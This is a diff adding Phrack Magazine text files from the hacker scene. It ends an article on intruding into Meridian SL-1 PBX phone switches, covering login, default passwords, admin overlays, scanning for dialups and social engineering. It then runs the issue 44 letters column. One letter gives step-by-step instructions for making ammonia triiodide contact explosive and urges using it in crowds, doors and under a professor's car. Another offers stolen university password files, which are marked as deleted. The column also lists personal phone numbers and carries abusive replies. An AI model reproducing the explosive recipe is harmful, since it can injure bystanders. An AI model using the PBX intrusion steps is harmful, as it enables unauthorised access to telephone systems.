+databits of 7, and stopbits of 1 (E71). Once connected press <CR> several
+times key to wake the system up. The system SHOULD respond with 'OVL111 BKGD'
+or 'OVL111 IDLE' and now you know it's alright to login. If the response is
+'OVL000' and then a '>' prompt you are already logged in, and you can go
+straight to loading an overlay.
+
+ Type 'LOGI' to initiate the login. Make sure when entering commands
+that they are all input in uppercase. The system responds with 'PASS?'. Now
+enter the password, (we do have a password, RIGHT?), it has a default, like
+everything else. The password will always be a 4 digit number, other
+characters are not valid. If you have correctly logged in, the system will
+respond with a '>' prompt. The system will display this prompt whenever
+waiting for operator input and is not running a diagnostic program. Once
+a diagnostic program is running the prompt becomes a '.' (period). If you
+are not logged in, there is no prompt.
+
+ What follows is an example of what you will see during login.
+
+{ Hit Carriage Return }
+OVL111 IDLE
+.
+.
+.LOGI                        { Initiate Login                    }
+PASS?                        { Enter password, it will not echo  }
+OVL015                       { Error code for incorrect password }
+TTY 01 SCH MTC    16:40
+
+OVL 45 BKGD
+.LOGI                        { Try again }
+PASS?
+.
+>
+OVL000
+>LD 22           { You are now logged in and ready to load an overlay program }
+   { in this case we are loading overlay 22, a print routine.   }
+PT20000
+
+REQ TID          { The REQ prompt appears, now enter your selection, in this }
+   { case we want to print the TID (Tape ID)                   }
+TAPE ID:
+LOADED XXXXXX
+DISK/TAPE   XXXXXX
+
+REQ ISS          { Enter ISS to view the Issue and Release number of the     }
+   { software/switch                                           }
+VERSION 1011
+RELEASE 14
+ISSUE 39
+
+
+REQ END          { Enter END to quit this overlay }
+>LOGO
+>
+.                { Logout and hangup }
+
+
+ Now after gaining this information, we can determine what type of
+system we're dealing with. Notice that the version number is 1011. Now
+refer back to the listing of SL-1 Models for the information we seek. We are
+logged into an x11 system (last 2 digits of the version number). Unfortunately,
+there are two system with x11 generics, and none of which have a release
+number of 14, so we're either dealing with an SL1-M or an SL1-S, with either a
+60-400 or 30-160 line capability respectively. Although this information isn't
+extremely useful, it comes in handy when determining how large the system is.
+
+
+         Overlay Programs
+         ~~~~~~~~~~~~~~~~
+
+ Upon first logging in, no program is loaded, and you must load a
+program (overlay) into system memory. This is done by the command 'LD'
+followed by a space and the overlay number. To load overlay 10 you would
+simply do a 'LD 10'. It will take approximately 1 minute to load the overlay
+into memory from tape, if the system uses a tape drive. If the system uses
+disk storage then it will load quickly. Once the program is loaded, a 'REQ'
+(request) prompt will appear. The system is now waiting for input from the
+administrator.
+
+ There are many different overlays which can be used, all of which
+are explained in the following section.
+
+Number     Name                          Purpose
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  10   500/2500 Type     Allows new 500/2500 telephone data blocks to be
+       Telephone         generated, existing office data modified, moved
+                         to a new TN location on the same loop, or removed
+                         from the system. Standard telephone sets.
+
+  11   SL-1 Type         Allows new SL-1 telephone data blocks to be
+       Telephone         generated, existing office data to be modified,
+                         moved to a new TN location on the same loop, or
+                         removed from the system.
+
+  12   Attendant         Allows new SL-1 attendant console data blocks to be
+       Console           generated, existing office data to be modified,
+                         moved to a new TN location on the same loop, or
+                         removed from the system.
+
+  13   DIGITONE          Allows new DIGITONE and SL-1 tone detectors blocks
+       Receiver and      to be generated, moved to a new TN location on the
+       SL-1 Tone         same loop, or removed from the system.
+       Detectors
+
+  14   Trunks            Allows new trunk data blocks to be generated,
+                         existing office data modified, moved to a new TN
+                         location on the same loop, or removed from the
+                         system.
+
+  15   Customer          Allows new customer data blocks to be generated,
+                         existing office data modified, or removed from the
+                         system.
+
+  16   Trunk Route/      Allows new trunk/ATM route and ATM schedule hours
+       Automatic Trunk   data blocks to be generated, existing office data
+       Maintenance       modified, or removed from the system.
+
+  17   Configuration     Allows the configuration record to be modified to
+       Record            reflect changes in the system parameters.
+
+  18   Speed Call        Allows speed call/system speed call and group call
+       Group Call Data   data to be generated, modified, or removed from the
+                         system.
+
+  19   Code Restriction  Allows code restriction data block to be generated,
+                         modified, or removed from the system.
+
+  20   Print Routine 1   Allows the printing of:
+                         - SL-1 TN data blocks
+                         - 500 TN data blocks
+                         - attendant TN data blocks
+                         - trunk TN data blocks
+                         - DIG data blocks
+                         - group call data
+                         - templates
+                         - speed call lists
+                         - hunting patterns of stations
+                         - unused units
+                         - unused card positions
+                         - terminal numbers
+
+  21   Print Routine 2   Allows the printing of:
+                         - customer data blocks
+                         - code restriction data blocks
+                         - route data blocks
+                         - a list of trunks in a route
+                         - ATM data
+                         - ATM schedules
+                         - TN associated with CAS keys
+
+  22   Print Routine 3   Allows the printing of:
+                         - the configuration record
+                         - directory number to TN matrix
+                         - equipped packages
+                         - history
+                         - password numbers
+                         - ROM QPC number
+                         - station category indication
+                         - version and issue of generic
+
+  23   ACD/Message       Allows ACD data, ACD management report schedules,
+       Center            and Message Center data to be generated, modified,
+                         or removed.
+
+  24   DISA              Allows data for direct inward system access to be
+                         generated, modified or printed.
+
+  25   Move Data         Allows movement or interchanges of data between
+       Blocks            loops, shelves and packs in the same customer
+                         group.
+
+  26   Do Not Disturb    Allows DND groups to be formed, changed, merged,
+                         removed or printed.
+
+  28   ANI Route         Allows ANI route selection data block to be
+       Selection         generated, modified, removed, or printed.
+
+  29   Memory/           Used to determine the amount of unused memory, and
+       Management        to determine if enough memory is available to add
+                         new data. Also used to respond to error messages
+                         SCH601 and 603 on Meridian SL-1 XN systems.
+
+  49   NFCR              Allows code restriction data blocks to be defined,
+                         modified, removed, or printed.
+
+  50   Call Park         Allows call park data to be generated, modified,
+                         removed, or printed.
+
+  73   Digital Trunk     Allows Digital Trunk Interface data to be generated
+       Interface         or modified.
+
+  81   Features/         Allows stations to be listed or counted according
+       Stations Print    to their features.
+
+  82   Hunt Chain/       Allows printing of hunting patterns and multiple
+       Multiple          appearance groups.
+       Appearance Print
+
+  83   TN Sort Print     Allows printing of stations according to station DES.
+
+  84   DES Entry         Allows the assignment of station DES (description)
+                         to 500/2500 sets.
+
+  85   DES Entry         Allows the assignment of station DES (description)
+                         to SL-1 sets.
+
+  86   ESN 1             Allows electronic switched network data defining
+                         BARS/NARS/CDP features to be generated, modified,
+                         or printed.
+
+  87   ESN 2             Allows electronic switched network data defining
+                         BARS/NARS/CDP features to be generated, modified,
+                         or printed.
+
+  88   Authorization     Allows data for Basic Authorization Code (BAUT) and
+       Code              Network Authorization Code (NAUT) to be generated,
+                         modified, or printed.
+
+  90   ESN 3             Allows data for ESN network translation tables to be
+                         generated, modified, or printed.
+
+  93   Mult-Tenant       Used to enable and administer multi-tenant service.
+       Service           For example, more than one company can use the same
+                         PBX.
+
+ Those are the main overlays used to modify setups and print the
+system configuration information. SL-1's are mainly used in buildings, and
+by larger companies, ranging from department stores to complete office
+complexes. The dialups are commonly found on an extension of the PBX. You
+can generally come across the dialup while scanning extensions on a Meridian
+Voice Mail system. Meridian SL-1's are a very common switch used on WATS
+lines, generally by larger companies. I've also talked to several people who
+have encountered the actual dialup modem to the switch on the public
+phone network (exchange scanning). Once you have found one, it's easy to
+identify with it's trademark 'OVL' greeting.
+
+
+          Meridian Manager
+          ~~~~~~~~~~~~~~~~
+
+ Obviously SL-1 administrators can't be expected to program a switch
+using such archaic methods, and remembering every prompt and required input.
+Northern Telecom has developed terminal software that makes the job easier,
+which replaces the traditional teletype setup with a PC running their terminal
+software. Each copy of the software is sold at upwards of $5000 for a site
+license, and you are entered into a license agreement with NT. As Northern
+Telecom puts it...
+
+ "Title to and ownership of Meridian SL-1 software shall at all times
+remain with Northern Telecom. Meridian SL-1 software shall not be sold
+outright and the use thereof by the customer shall be subject to the parties
+entering into software agreement as specified by Northern Telecom."
+
+ Each copy contains a serial number which matches the PBX's own serial
+number, thus cannot be used on any switch other than one specified in your
+license agreement. The software provides a user friendly method to add,
+remove, and modify information, without dealing with the unfriendly switch
+directly. Initially the software will phone the specified switch, and check
+the serial number of the switch. After this, it will load and run the print
+overlays, and ascii capture all output, building several database files
+locally, on your own system. After this is completed, it disconnects, and
+you now have the complete configuration of the switch sitting on your system.
+You now make the necessary modifications, and upon completion, the software
+again calls the switch, and updates the switches database. The software,
+called the Meridian Manager, comes complete with a full internal tutorial on
+how to use it, and is very helpful. Thanks Northern Telecom, for making it so
+easy!
+
+       Additional Information
+       ~~~~~~~~~~~~~~~~~~~~~~
+
+ If you require programming information, probably the handiest piece
+of material that I've found is the Data Administration, Generic X11 : Pocket
+Reference Guide. This is a pocket book that contains a listing of all
+Overlay Programs, possible inputs and error codes. The reference is about
+100 pages, and can be ordered from Northern Telecom, the order number being
+P0674785,S086/01. Social Engineering may be required.
+
+* Meridian and SL-1 are trademarks of Northern Telecom Limited.
+
+Greetings to Talsfalon, Akalabeth, Okinawa, Mechanix, and all those I've
+forgotten. See you at hohocon, we'll be giving away one of the previously
+mentioned Pocket Reference Guide's at the raffle.
+
+I can be reached at my email address, iceman@silicon.bison.mb.ca, or my own
+system at 204-669-7983.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+
+mQCNAiwKJFQAAAEEALaKeir7NjTo0SawUR5jC7EIxTl+f1Yv3AvxwmHMOC0aZJwq
+WHqZajrdQ0UXKS6j/2bKgFwfuo76O/KeZmuo4Q05JLRl1epO6SfGMjfSP0zR2y0n
+2oSsiA9VNpI/eeZAqJpa15ItpWEXZOwNIHKvTjEqOjADwtVCvkRf68TwYncbAAUR
+tCNJY2VtYW4gPGljZW1hbkBzaWxpY29uLmJpc29uLm1iLmNhPg==
+=BlEm
+-----END PGP PUBLIC KEY BLOCK-----
+
+           Iceman
+  * The Digital Resistance *
diff --git a/phrack44/2.txt b/phrack44/2.txt
new file mode 100644
index 0000000..88d1186
--- /dev/null
+++ b/phrack44/2.txt
@@ -0,0 +1,1254 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 2 of 27
+
+****************************************************************************
+
+                                Phrack Loopback
+
+Hey,
+
+Well, Im trying to set up a BBS here in small little old northeast pa, and
+I'm wondering if there is any way I could post the issues of phrack on it.
+
+I've gotten some issues from MindVOX and loved em.  Thought others would
+like em.  Please send mail back.
+
+the soon to be SySop of LLD.
+Rebls
+
+[I have no problems with people putting copies of Phrack online
+ on bbses for others to download, as long as they stay complete, and
+ as long as you are not charging your users for access to download
+ the files.  If you are, you are a business, and if you're planning on
+ making money off of Phrack, you better email me right away.  :) ]
+
+-------------------------------------------------------------------------------
+
+Control-Alt-Delete
+INSOC Network Newsletter
+
+Information Society is coming back with a harder, more alternative edge.
+
+16 pg magazine format, quarterly, $5.  Strongly supported by Kurt Harland,
+lead singer.  Back issues, merchandise available.
+
+Issue #3 - October 1.  Join the Network!
+
+Control-Alt-Delete
+5822 Green Terrace Lane
+Houston, TX 77088-5414
+713/448-3815
+JBeck@AOL.COM
+
+[Here's a plug for a nifty little 'zine.  It's amazing how much stuff
+ someone can put out about Information Society.  Definitely a must for
+ the hardcore INSoc fan.]
+
+-------------------------------------------------------------------------------
+
+I consider myself pretty much an "individual" and an "end user," but
+I just recently contracted with Mesa State College (of Colorado) to write a
+simple computer program to organize the tool bin for the vocational
+technology department.  Does this make me a computer consultation contractee
+of a government, business, or organization?  Now that I think of it, the
+program is designed to keep track of tools so that students don't walk off
+with them, so that further makes me a "SECURITY computer consultation
+contractee."  Geez.  I didn't realize what an important job I had, nor how
+I am part of the global conspiracy of "computer professionals" to rip
+people off.
+
+Hm.
+
+What to do, what to do...  Well I guess in the spirit of Phrack magazine,
+and ignoring the entirely hypocritical and pointless posturing that you have
+engaged in recently, I will go ahead and read it DESPITE the very sternly
+worded Copyright Warning which you have so prominently placed in file number
+one.  If you feel that the information presented in Phrack 43 should be kept
+from certain types of people, and if you are frustrated by the fact that these
+people seem to be getting access to the information even when you have a LAW
+against it...  Well.. "Tough shit."
+
+Bryce
+
+[Bryce:
+
+ The "entirely hypocritical and pointless posturing" that we have engaged
+ in is to prove a point.  A point that is obviously "beneath" you
+ as you have missed it entirely.
+
+ Phrack has been, and always will be free.  The copyright notice
+ is to ensure that Phrack is not sold by third parties.  The registration
+ notice is only applicable to certain parties whose interests may be
+ opposite those of Phrack Magazine.  As you probably realize, it
+ is up to the INDIVIDUAL to decide whether or nor they register.  Most
+ corporate/law enforcement/security officials chose not to, hence,
+ they are guilty of the same thing they accuse hackers of.
+
+ Now, this aside, I think your letter was real shitty, and you came off like
+ a smarmy dickhead.  I personally could care less if you read the magazine
+ or wipe your ass with it.  Its up to you.  The information is provided
+ for EVERYONE to do with whatever the hell the like.
+
+ If my attitude is contrary to what you feel is "the spirit" of Phrack,
+ well... Tough Shit.]
+
+-------------------------------------------------------------------------------
+
+Greetings,
+
+After reading/hearing about PHRACK, 2600 and others I was pleased to
+finally receive the latest issue of Phrack.  I have a few questions and
+suggestions to make:
+
+        + I have an idea for an article and would like very much to
+        contribute it to Phrack.  How do I go about this?  Does the article
+        have to be in any particular format?  Would it be a good idea to
+        have submission details in every issue?
+
+        + Is it possible to submit an article to both Phrack and 2600?
+        Would it go against me if I did so?
+
+        + I have heard of a zine similar to 2600, but specifically for the
+        UK.  I think it might be called 2800?  Is it still going?  And how
+        do I get a hold of or in touch with it?
+
+        + With regards to your compilation of phone numbers of dialups
+        to universities in the States, I have been trying for a year or
+        so to compile a similar list specifically for the UK.  It has
+        been a bit difficult since those lovely people at the JNT dont
+        like this sort of information being compiled.  (Despite the fact
+        you can probably walk into any Computer Centre at a site and pick
+        up a free news letter containing such information ;-).  Anyway, if
+        any UK readers would like to help me in this task, I would very
+        much appreciate it.
+
+And Keep up the good work!
+
+[I'll handle all of this in the order you asked:
+
+        1)  Submissions to phrack can be thru email at our well address
+        phrack@well.sf.ca.us, or can be mailed via US mail to
+        Phrack Magazine, 603 W. 13th #1A-278, Austin, TX, 78701.
+        They don't have to be in any specific format (Style-wise) or
+        on any particular type of media.  I can read almost anything
+        for almost any type of computer.
+
+        2)  You can certainly send your work to both Phrack and 2600.
+        I would ask that if you do so, please indicate it to both
+        myself and Emmanuel Goldstein of 2600 that you have sent it
+        to both magazines.  I don't want anyone ragging on me for
+        "ripping of 2600" by publishing something they did, as our
+        schedules are about a month apart.
+
+        3)  I have never heard of 2800.  Perhaps our readers have.
+
+        4)  I will make sure to forward any UK dialups I get to
+        you for any readers who send them in.  I do want to
+        publish your list once you get it compiled though.]
+
+-------------------------------------------------------------------------------
+
+I am currently in the final stages of writing my magna thesis in History
+here at the University of Minnesota.  Over the past 6 months or so I have
+been looking at the whole Neidorf/Riggs fiasco and have decided to do a
+characterization piece about the Prophet.  Bruce Sterling
+directed me towards you as someone who could give me some personal
+information on Riggs (His appearance, attitude, and even obscure things
+such as habits and behaviors).  From past experience, I have seen that
+this information is absolutely necessary in writing these types of
+"unconventional" histories.
+
+Because I have never met the guy or even seen a picture of him, I must rely
+on people like yourself who may have met him or may know people who have known
+him.  If you can help me by directing me towards people who have known him
+in the past or currently know him, it would be greatly appreciated.  I
+really don't want to bother Riggs (and even if I did, I probably would not
+get much out of any encounter).
+
+Thanks in advance.
+
+Jason W. Esser
+
+[I'm sorry, but I really can't help you in that respect.
+
+ I would suggest you talk to Rob if you want to write about him.
+ Or at a minimum Frank or Adam.  They are all very easy to contact.
+ Try directory assistance.]
+
+**He writes back**
+
+THANKS!  You have been EXTREMELY helpful in furthering research into the
+CU!  You are a man of great genius and integrity.  Jerk.
+
+Jason W. Esser
+
+[Jerk?
+
+ You, a stranger, write me and want to know the details about a friend of
+ mine, without even having the courtesy to let HIM know that
+ you are doing such a thing?
+
+ What would YOU think if someone out of the fucking blue phoned you
+ up and asked for information about someone you knew, under the guise
+ of some kind of psychological profile, and wanted to know
+ what they looked like, personality quirks, etc...
+
+ What you are doing has NO RELATIVE MERIT TO THE COMPUTER UNDERGROUND.
+ In fact, I find it intrusive and repulsive.  I am not some kind of
+ fucking clearing house for information about people I know.  Try
+ his prosecutors for that.  Of, if you had any balls at all, you
+ could call Atlanta directory assistance and get phone numbers for
+ Riggs, Darden and Grant.
+
+ Since you've been such a dick, I suppose I'll call them myself and
+ let them know that someone is trying to get personal information
+ about at least one of them.  I'm sure they will be thrilled.
+
+ So, as for my great genius, you should have asked me questions about
+ UNIX...you would have gotten a much more thorough reply.
+
+ Asshole.]
+
+-------------------------------------------------------------------------------
+I would like to make my point in e-mail that I do not wish my
+program, ISS (Inet Security Scanner), to be in Phrack.
+
+Thank you.
+
+Christopher William Klaus
+
+[I would just like to make my point in e-mail that I do not give a shit
+ about your program ISS (Inet Security Scanner), and it is not
+ going to be in Phrack.]
+
+-------------------------------------------------------------------------------
+Hello, This message desires an urgent reply-thank you
+
+Recently a friend of mind came into some electronic trouble of sorts.  I
+was wondering if it would be possible to obtain a list and an immediate
+way to contact lawyer(s) who specialize in such cases.  Such as the lawyer
+who represented the infamous E911 case.  As you could imagine, time is of
+essence.  Thank you in advance for a quick reply.
+
+Shadowvex...
+
+[Depending upon where your friend is, and what he/she has done
+ there are a number of people to talk to.
+
+ If it is a case that may involve issues of constitutionality
+ he should call Mike Godwin at the EFF.  (godwin@eff.org)
+ Or may want to contact a local ACLU office.
+
+ If he just wants to talk to a lawyer who MIGHT offer him some
+ advice on criminal matters he could try Steve Ryan
+ (blivion@zero.cypher.com)
+
+ Craig Neidorf's lawyer probably would not be
+ interested in taking such a case, unless it would pay him well
+ and was in the Midwest.
+
+ Remember, if your friend got busted hacking, lawyers aren't going
+ to help much.]
+
+-------------------------------------------------------------------------------
+
+I recently learned that when a prank caller calls you on a USDETEST
+DIRECT telephone all you have to do is hang up the phone and then pick
+it up again, then hit '*57' and hang up.
+
+This logs the prank callers info into the phone company's computer
+so that if he persists, they have proof of his deeds.  After 5-6 prank calls
+and logging them every time, you may call the phone co. and demand that
+they give you the prank caller's name, and phone number.  You may also have
+the police notified of the prank caller's address, for severe cases.
+
+After 5 logs of the activity, the phone co. is required by law to
+give you the person's information.  We used it when my aunt was getting
+a silent caller last month.
+
+[I hope you know that each time you use the Call-Trace feature you
+ get billed for it.  Most modern places have that feature and
+ many of the other custom calling feature upgrades like caller id
+ implemented now a days.]
+
+-------------------------------------------------------------------------------
+
+Hey is phrack still alive?  Also, do you know the whereabouts of Full Disclosure
+magazine and Hack-Tic the Dutch magazine?  If so do you have the phone number
+and address to them?
+
+Plus, do you know any other mags, that's supports hacker/computer virus (for
+IBM, MAC, and AMIGA) cracker, anarchy and phreak information?  I have the 2600.
+Are there others our there?
+
+[Phrack is still alive.  Notice this response.  That should be proof.
+ Hack-Tic is easily reached by mailing the editor
+ rop@hacktic.nl
+
+ Full Disclosure has no phone.
+ Full Disclosure
+ P.O. Box 903
+ Libertyville, IL 60048
+
+ There really aren't any other "hacker" mags.  Full Disclosure isn't one
+ by the way.  Hack-tic is entirely in Dutch, so unless you speak Dutch
+ it won't do you much good.  There are a few mags that kinda cover the whole
+ net scene, like Boing Boing, Gray Areas, etc...there was a big list of cool
+ magazines in the Line Noise section of Phrack 43.]
+
+-------------------------------------------------------------------------------
+
+If possible, I'd like to include an ad for my system in Phrack:
+
+][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][
+                     Silicon Valley
+Home of Freedom       2o4-669-7983       Phalcon/Skism Canada
+cDc Global Domination  1 N0de, 24oo 0nLY!    Northern Phun Co.
+Factury Direct Outlet      2 3l33t for U!          Dist. Site
+
+S00per 3l33t UUCP Mail (silicon.bison.mb.ca), N0 k0dez, war3z, ansi
+
+**** Thousands of the m0st eut1mat3-sp1ffy-krad3st Tf1l3s ar0und! ****
+
+Freedom,Phrack,cDc,PHUN,LoD,Cud,NSA,ATI,NIA,ANE,Chaos,uXu,AOTD,Chalisti,
+CERT,CIAC,DDN,LOL,40HEX,Iformatik,NFX,FBI,NuKE,Phantasy,Worldview,NARC,
+PPP,Telecom Archives,EFF,DFP,Legal Papers,CPI,Vindicator Productions,DoA,
+Virii,ource C0de,Scanners,Hackers,Cell Fraud,AWA,UN*X Security/Crackers,
+Anarkey,ArcV,Trident,Phalcon/Skism,Summercon GIFS,RL,RDT,Syndicate,UPI,
+Encryption,PGP,Networking,Radio Modification,Virus S0urce,USEnet,Email.
+        The latest news in the hp and telecom community!
+         To apply, type 'apply' at the 'local >' prompt
+         for questions, mail iceman@silicon.bison.mb.ca
+
+][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][
+
+-------------------------------------------------------------------------------
+
+Two boys were charged with attempted murder for allegedly stuffing a
+3-year-old down a Chicago high-rise building's trash chute, police said.
+The boys, ages 11 and 13 were charged with aggravated battery and
+attempted murder.  The 3-year-old fell six floors but his fall was
+broken by a pile of trash.  He was rescued by a custodian who saw his feet
+and turned off a trash compactor just before it would have crushed him,
+police said.
+
+yeah, sign me up.
+thanks.
+
+[I have got to say, this was the weirdest subscription request I've gotten
+ to date.]
+
+-------------------------------------------------------------------------------
+
+" To the free flow of information, the life-blood of a prosperous society "
+                               By
+              The Philosophical Phreaker (a.k.a King Blutto)
+
+Introduction:  Don't confuse me with KING BLOTTO in any way...  The idea
+behind my name is -- THe man is gone, but let the legend live on.
+
+Univeristy of South Florida <-- One of the easiest target that I have
+ever come across... The worst security ever.  Thanks goes to Hiawatha for
+some of the information.
+Just to prevent any loozer from using this information I am not including
+the address of this particular sight.  If you are "mildly" qualified you
+can find the address...  Anywaz, here are some account that I have found
+using the UNIX password hacker programs.  I am also including the password
+file so all you bad-boyz, can use your 250,000 word dictionaries and beat
+the crap out of this system.
+
+[1500 line /etc/passwd file deleted]
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Southern Methodist Univeristy
+First of all, I must congragulate the operators of this system. There security
+was "almost" impregnable.  With an abundance of traps.. It made attempts to
+identify its callers, and if it could not identify its callers it would
+disconnect.  This system was a little bit of challenge, I am again
+including the password file for you'll to hack as many account as you want.
+Since I don't have an abudance of accounts on this system, I will only
+give you a hint on how the passwords work.
+Hint:  Most password are like <lastname>123
+Go for it guyz.
+
+[1200 line /etc/passwd file deleted]
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Regards: Lex Luthor, The Ozone, Hiawatha, StolenProcess, Mark Zero and all
+         you guyz who were on the The Atmosphere!
+
+[Ok, first off, THIS IS NOT SOMETHING TO SUBMIT TO PHRACK.  This is something
+ to submit to CERT.
+
+ What the hell were you thinking?
+
+ Anyone can get their own fucking password files man.  And beyond that,
+ if you still need a password file to get into a system, then you need to
+ go read a few books on tcp/ip.
+
+ People, please don't send Phrack this kind of bullshit.  This piece of mail
+ was about 250K.  It was a worthless piece of shit, and only wasted time
+ and energy for everyone involved.
+
+ And get a new handle.  Blotto would probably kick your ass for being so
+ lame and having a handle so close to his.  :)  ]
+
+-------------------------------------------------------------------------------
+
+A warm welcome from across the sea from myself, and I'm sure on behalf of
+all the other hackers/phreakers who are in Great Britain.
+
+        After reading about HoHoCon in #42, I would really appreciate it if
+you could assist me in getting hold of the following:
+
+a) When bootleg gave his presentation he handed out a diskette containing
+   information on reprogramming cellular phones... I would dearly love to
+   have a copy of this information.
+
+b) Also on the subject of HoHoCon, I would like to get in touch with Jim
+   Carter, or, have a look at any notes/information that he handed out
+   regarding 'tempest' electronic eavesdropping.
+
+Thanks, -> The Operator <-
+
+[Bootleg's file is called BOOTLEG.ZIP and I'm almost 98% sure that its
+ somewhere on zero.cypher.com's ftp site.  If it isn't I'll try to put
+ it there.
+
+ Jim Carter is in Houston, Texas and can be reached at 713-568-8408
+ or 7035 Highway 6, S. #120, Houston, TX 77083.  Jim didn't really hand
+ anything out at HoHoCon, but if you were to call him, he MIGHT be able
+ to direct you somewhere.  He's a good guy, but this is his JOB so don't
+ expect him to give anything away.]
+
+-------------------------------------------------------------------------------
+
+'lo,
+
+    I was just wondering if there's any way I can subscribe to your 'zine,
+I can't subscribe through the method in phrack 39 because I send Internet
+mail through the Cserve - Internet gateway and compuserve can't accept
+messages with no subject.
+
+   Also, I'm a Canadian Hacker who's just starting out, and since pretty much
+all the Hacking BBS's are in the U.S., I need to get into a Sprintnet PAD, and
+an out dial, so, is there anyway to get a copy of the SprintNet directory
+phrack 42 which still contains passwords? (fuck, what a leech)
+
+{Oh yeah, I miss the explosive recipes from early issues, here's one from my
+ personal collection, you can publish it if you want.}
+
+                      AMMONIA TRIIODE CRYSTALS
+
+     Chemicals                     Equipment
+     ~~~~~~~~~                     ~~~~~~~~~
+
+     1-Iodine Crystals             1-Funnel & filter paper
+                                     (coffee filters work pretty well)
+     2-Clear household Ammonia
+       (or pure ammonia for the
+       clinically insane)          2- 2 glass jars
+
+   Ammonia Triiode is a blackish crystal which explodes under heat inpact
+producing a toxic gas which stains everything around it purple (some serious
+vandalism potential here). WARNING -- be sure to use an ammonia which is
+impure; crystals made with pure ammonia will explode if touched or in
+sunlight!
+
+1) Place about two teaspoons of iodine into one of the glass jars and add
+enough ammonia to completely cover the crystals.
+
+2) Put the paper into the funnel and place the funnel over the other jar.
+
+3) Let the iodine soak in the ammonia for a few minutes (5) and then filter
+the solution into the other jar.
+
+4) Take the purplish crystals from the filter paper and dry them on a piece of
+paper towel, separating them into smallish pieces. (you'll probably want to
+dry them in a cool, dark place which would look good painted a blackish purple,
+in case the crystals detonate)
+
+8) After the crystals dry gently place each piece onto a square of tape
+(opaque duct tape or, electrician's tape work best) and put a piece of tape
+over them. _GENTLY_ press the tape together _AROUND_ the crystal.
+
+   Once made the crystals will last a week. When detonated they produce a
+bang and a cloud of gas but no flame. In other words, their perfect for
+putting on the ground in crowds, in the hinges of your University's doors,
+in front of the wheels of your favorite professor's car etc.
+
+                                                      />ragline
+
+[Ahhh, sweet destruction.  Listen, recipes like this one are very DANGEROUS.
+ Do not attempt to do this.  Phrack will take no responsibility for any
+ damages or injuries resulting from anyone constructing the above.
+
+ About the SprintNet scan...Phrack doesn't publish passwords.  If you
+ were any kind of hacker at all, you would enjoy trying to get them yourself.
+ Does your mommie still tuck you in to bed too?
+
+ About subscribing through CompuServe, I don't know what you may have read
+ in the past, but Phrack has many CompuServe subscribers.  Try requesting
+ a subscription.  Everything should work out fine.]
+
+-------------------------------------------------------------------------------
+
+Hey.  I'm an editor of a magazine being put together in Toronto, and I'd
+like to ask to use your disclaimer.  I'll not bore you with the blabberings
+of how 'el33+e' this mag will be, as I'm sure you just *love* those type of
+messages.  (Note:  The mag's called, 'Ban This', if you see it around, I'd
+appreciate any feedback you can give.)
+
+Anyhow, thanks for listening.
+
+[Feel free to use the disclaimer.  It would be best if you mentioned Phrack
+ somewhere in there as well.]
+
+-------------------------------------------------------------------------------
+
+xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
+
+                           IT'S BACK!!!!W$#@$#@$
+
+                               _-_-_-_-_-_-_
+                               (           )
+                                (  B00m   )
+                                 (      )
+                 CAU               \  /                 CAU
+                                  __||___
+           "We WiLL BloW     /---/|_____|\----\    uP YoUr CaR!"
+                             /CaU-__WuZ__-HeRe\-
+                                (0)       (0)
+
+                               fARM R0Ad 666
+      _   _                       PaRt II               _   _
+     ((___))                   (713)855-0261           ((___))
+     [ x x ]                                           [ x x ]
+      \   /    cDc            SySoP: EighT BaLL         \   /    cDc
+      (' ')                     COs: M.C. AllaH         (' ')
+       (U)   K-C0W F0RCe             ChilliN             (U)   K-C0W F0RCe
+                                     Nitzer EbB
+
+     ' CAU HomesitE                     ' CAU Member SitE
+     ' cDc Factory Direct OutleT(KCF)   ' 0b/GyN Member SitE
+     ' Pure Hack/Phreak OrienteD        ' Serious Hack/Phreak DiscussionS
+     ' Flashback SoftwarE               ' No RatioS
+     ' 24oo-14.4 bpS                    ' Exophasia Submission SitE(ThP)
+
+xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
+
+[Call now and watch 8-Ball shoot up!]
+
+-------------------------------------------------------------------------------
+
+Digital Highways magazine is an Alternative & Metal Magazine.
+We Have Reviews of many Local bands from all over USA and National bands.
+We have Press Releases, Concert Information, National Tours, Local tours,
+and small tours (small bands) to the large world-wide known bands.
+Top 10 Music Lists, Information on how to get Free to Really Cheap info.
+from the music industry. PLUS poetry (alternative) and other info from
+what's coming out in the stores or who's recording and what not.
+
+all of this for $2 for US and Canada (US Funds only) And for Foreign People
+its 4 dollars Us funds.
+
+As my best deal goes.. if you send in a demo tape for review (it must be
+your band's),  or if you send in poetry and we publish it you get one free
+issue.  Demo tape senders get a free issue no matter what, and you always
+get a review. we have FREE classifieds.  All subscribers can get free listing.
+(we may edit or drop any ad, and we may not publish all ads.)
+
+This is the first issue, so send away! to this address rem US/CAN 2$ other 4$
+
+Digital Highways
+Po Box 38
+Troutville,Va 24175
+
+-------------------------------------------------------------------------------
+
+Hi Erik Bloodaxe,
+
+I am a student of Computer Science at University of Salerno (South-Italy),
+near Naples.
+
+I have so many copies of Phrack Magazine and I think that You are the Best
+in the Computer Underground Community.
+
+So I leech Your Magazine from many BBS (the ones with the h0ttest H/P/CC
+Area) like this:
+
++49-58618795            NightBox
++46-18262804            EaglesNest
++1-5152553212           Down of Immortality (ex Pirate's Ship TRSi/WHQ)
+                        ( here there the my friend SysOp Mike Bockert
+                          best known a.k.a THE SKELETON / TRSi-TDT )
++1-2018184894           TUGO The UnderGround OASIS --->  ZZC USHQ
++598-2-497108           Abn0rmal States
++598-2-421996           ( here there is another SysOp friend of mine
